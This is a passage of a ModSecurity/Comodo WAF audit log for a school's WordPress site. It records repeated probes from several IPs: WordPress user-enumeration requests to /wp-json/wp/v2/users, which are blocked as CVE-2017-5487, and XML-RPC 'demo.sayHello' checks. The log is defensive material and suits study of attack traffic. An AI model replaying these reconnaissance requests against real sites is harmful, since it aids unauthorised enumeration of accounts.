userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823034025080 5975 (- - -) Stopwatch2: 1746823034025080 5975; combined=4394, p1=571, p2=3592, p3=29, p4=32, p5=99, sr=74, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04b72b39-Z-- --3910a44c-A-- [10/May/2025:03:37:42 +0700] aB5nlhLuBiaF9R054QBR6gAAABA 103.236.140.4 60268 103.236.140.4 8181 --3910a44c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3910a44c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3910a44c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746823062557319 15382 (- - -) Stopwatch2: 1746823062557319 15382; combined=25349, p1=481, p2=829, p3=0, p4=0, p5=12034, sr=88, sw=0, l=0, gc=12005 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3910a44c-Z-- --9db85e30-A-- [10/May/2025:03:37:47 +0700] aB5nmxLuBiaF9R054QBR7AAAABI 103.236.140.4 60272 103.236.140.4 8181 --9db85e30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.4 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9db85e30-C-- demo.sayHello --9db85e30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9db85e30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823067214043 5319 (- - -) Stopwatch2: 1746823067214043 5319; combined=3964, p1=516, p2=3239, p3=21, p4=23, p5=95, sr=77, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9db85e30-Z-- --bb9da319-A-- [10/May/2025:03:40:29 +0700] aB5oPRLuBiaF9R054QBR7gAAABU 103.236.140.4 60280 103.236.140.4 8181 --bb9da319-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb9da319-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb9da319-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746823229310689 3286 (- - -) Stopwatch2: 1746823229310689 3286; combined=1357, p1=488, p2=840, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb9da319-Z-- --3c28ea14-A-- [10/May/2025:03:40:35 +0700] aB5oQxLuBiaF9R054QBR8AAAABc 103.236.140.4 60284 103.236.140.4 8181 --3c28ea14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c28ea14-C-- demo.sayHello --3c28ea14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c28ea14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823235122960 4003 (- - -) Stopwatch2: 1746823235122960 4003; combined=2730, p1=505, p2=2079, p3=17, p4=15, p5=65, sr=97, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c28ea14-Z-- --18de3d4d-A-- [10/May/2025:03:41:47 +0700] aB5oixLuBiaF9R054QBR8wAAAAQ 103.236.140.4 60304 103.236.140.4 8181 --18de3d4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --18de3d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18de3d4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746823307718846 3098 (- - -) Stopwatch2: 1746823307718846 3098; combined=1316, p1=442, p2=845, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18de3d4d-Z-- --e456f715-A-- [10/May/2025:03:41:53 +0700] aB5okRLuBiaF9R054QBR9QAAAAY 103.236.140.4 60308 103.236.140.4 8181 --e456f715-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e456f715-C-- demo.sayHello --e456f715-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e456f715-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746823313524822 5171 (- - -) Stopwatch2: 1746823313524822 5171; combined=3992, p1=463, p2=3306, p3=27, p4=27, p5=98, sr=66, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e456f715-Z-- --d316816d-A-- [10/May/2025:03:59:58 +0700] aB5szquC4AqLGUOyzyX2aAAAAIw 103.236.140.4 33528 103.236.140.4 8181 --d316816d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d316816d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d316816d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746824398727824 3081 (- - -) Stopwatch2: 1746824398727824 3081; combined=1343, p1=449, p2=858, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d316816d-Z-- --7332fb44-A-- [10/May/2025:04:00:05 +0700] aB5s1auC4AqLGUOyzyX2aQAAAI0 103.236.140.4 33532 103.236.140.4 8181 --7332fb44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7332fb44-C-- demo.sayHello --7332fb44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7332fb44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746824405490483 6557 (- - -) Stopwatch2: 1746824405490483 6557; combined=4674, p1=548, p2=3829, p3=32, p4=35, p5=135, sr=72, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7332fb44-Z-- --09b58c5e-A-- [10/May/2025:04:16:40 +0700] aB5wuKuC4AqLGUOyzyX3IQAAAIU 103.236.140.4 35330 103.236.140.4 8181 --09b58c5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09b58c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09b58c5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825400269770 3369 (- - -) Stopwatch2: 1746825400269770 3369; combined=1447, p1=505, p2=908, p3=0, p4=0, p5=33, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09b58c5e-Z-- --f94a7e16-A-- [10/May/2025:04:16:46 +0700] aB5wvquC4AqLGUOyzyX3IwAAAIc 103.236.140.4 35334 103.236.140.4 8181 --f94a7e16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f94a7e16-C-- demo.sayHello --f94a7e16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f94a7e16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825406145765 5117 (- - -) Stopwatch2: 1746825406145765 5117; combined=4044, p1=496, p2=3345, p3=23, p4=28, p5=89, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f94a7e16-Z-- --130bd947-A-- [10/May/2025:04:17:23 +0700] aB5w46uC4AqLGUOyzyX3JAAAAIg 103.236.140.4 35346 103.236.140.4 8181 --130bd947-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --130bd947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --130bd947-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825443821185 3600 (- - -) Stopwatch2: 1746825443821185 3600; combined=1590, p1=547, p2=1011, p3=0, p4=0, p5=32, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --130bd947-Z-- --01236b5e-A-- [10/May/2025:04:17:26 +0700] aB5w5quC4AqLGUOyzyX3JQAAAIk 103.236.140.4 35350 103.236.140.4 8181 --01236b5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01236b5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01236b5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825446172480 2282 (- - -) Stopwatch2: 1746825446172480 2282; combined=1107, p1=374, p2=706, p3=0, p4=0, p5=27, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01236b5e-Z-- --0e21c174-A-- [10/May/2025:04:17:29 +0700] aB5w6auC4AqLGUOyzyX3JgAAAIo 103.236.140.4 35352 103.236.140.4 8181 --0e21c174-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e21c174-C-- demo.sayHello --0e21c174-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e21c174-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825449515354 5430 (- - -) Stopwatch2: 1746825449515354 5430; combined=4126, p1=487, p2=3342, p3=30, p4=92, p5=101, sr=108, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e21c174-Z-- --f166185f-A-- [10/May/2025:04:17:31 +0700] aB5w69r9PbfRBMhzxmRU8QAAAEA 103.236.140.4 35358 103.236.140.4 8181 --f166185f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f166185f-C-- demo.sayHello --f166185f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f166185f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825451248323 5125 (- - -) Stopwatch2: 1746825451248323 5125; combined=3867, p1=490, p2=3167, p3=21, p4=23, p5=96, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f166185f-Z-- --177e952d-A-- [10/May/2025:04:18:43 +0700] aB5xM9r9PbfRBMhzxmRU8gAAAEM 103.236.140.4 35362 103.236.140.4 8181 --177e952d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --177e952d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --177e952d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825523914057 3142 (- - -) Stopwatch2: 1746825523914057 3142; combined=1385, p1=501, p2=854, p3=0, p4=0, p5=29, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --177e952d-Z-- --ee458922-A-- [10/May/2025:04:18:50 +0700] aB5xOquC4AqLGUOyzyX3KwAAAJA 103.236.140.4 35366 103.236.140.4 8181 --ee458922-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee458922-C-- demo.sayHello --ee458922-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee458922-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825530650473 5841 (- - -) Stopwatch2: 1746825530650473 5841; combined=4289, p1=577, p2=3482, p3=29, p4=31, p5=99, sr=115, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
